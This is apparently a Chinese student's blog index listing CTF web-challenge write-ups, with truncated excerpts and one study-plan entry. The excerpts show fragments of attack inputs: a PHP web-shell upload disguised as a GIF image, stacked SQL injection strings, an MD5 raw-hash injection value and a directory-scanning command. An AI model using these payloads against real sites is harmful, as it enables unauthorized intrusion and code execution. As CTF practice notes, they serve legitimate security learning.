note-35 Mini L-CTF Click and Click当初没做出来,去西电CTF平台复现官方wp:先用JavaScript在浏览器控制台刷够10000 1234but = document.querySelector("#app > main > div > button")for (var i = 0; i < 10000; i++) { 2025-05-14 #web
Plan2 计划(2025.5.12)已经打完御网杯,结果虽然还没出来,但是现在应该计划一下这个学期后半段该干嘛了 Web学习web现在我觉得勉强算入门了,但是还不能结束刷题,尽量争取一天两道题的量还好两天一blog,这次就追求质量了,不用快速泛刷了 等御网杯结果出来再开始准备线下赛,最迟是5.18,线下赛开赛是7.11,那还来得及冲刺一下 英语六月就要考四级了。单纯虽然已经跟着百词斩背的快四分之 2025-05-12 #plan
note-34 Mini L-CTF GuessOneGuess下载源码 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889 2025-05-11 #web
note-33 [SUCTF 2019]CheckIn传正常图片提示里面有<?不给传,传码看看: 12345678910111213141516171819202122232425POST /index.php HTTP/1.1Host: 5f2a0c7d-2bd7-429f-8299-9f0f5b659699.node5.buuoj.cn:81Content-Length: 407Cache-Contro 2025-05-07 #web
note-32 [CISCN2019 华北赛区 Day2 Web1]Hack Worldbuucft里提示有sql,上来给了个输入框,但是是post而,抓包看: 123456789101112131415POST /index.php HTTP/1.1Host: cb3e0494-3cbe-4dca-b625-ed7bbc363bbe.node5.buuoj.cn:81Content-Length: 4Cac 2025-05-01 #web
note-31 [RoarCTF 2019]Easy Calc进去后是个页面,输入计算式,计算结果,没见过类似的题目啊,f12,发现有个calu.php,访问得到源码: 123456789101112131415<?phperror_reporting(0); //关闭错误报告if(!isset($_GET['num'])){ show_source(__FILE__); 2025-04-27 #web
note-30 [ACTF2020 新生赛]BackupFile扫目录一直扫不出来,扫了十来次,最后发现是是请求太快, 1dirsearch -u http://087da459-7de3-4061-82c8-b3cf69426d11.node5.buuoj.cn:81/ -w backup_include.txt --delay=1 -t 2 终于发现备份文件/index.php.bak 1234 2025-04-23 #note
note-29 [极客大挑战 2019]Upload123456Content-Disposition: form-data; name="file"; filename="php.phtml"Content-Type: image/jpegGIF89a<script language='php'>eval($_GET["z&quo 2025-04-21 #note
note-28 [BJDCTF2020]Easy MD5在bp查看相应,看到:hint: select * from ‘admin’ where password=md5($pass,true)试一下ffifdyop返回的页面中有: 1234567<!--$a = $GET['a'];$b = $_GET['b'];if($a != $b &&a 2025-04-17 #note
note-27 2019 review-强网杯-随便注再做一遍 12345678910111213141516171819202122231'show tables#1';show tables;#1';select group_concat(culumn_name);#return preg_match("/select|update|delete|drop|insert 2025-04-17 #note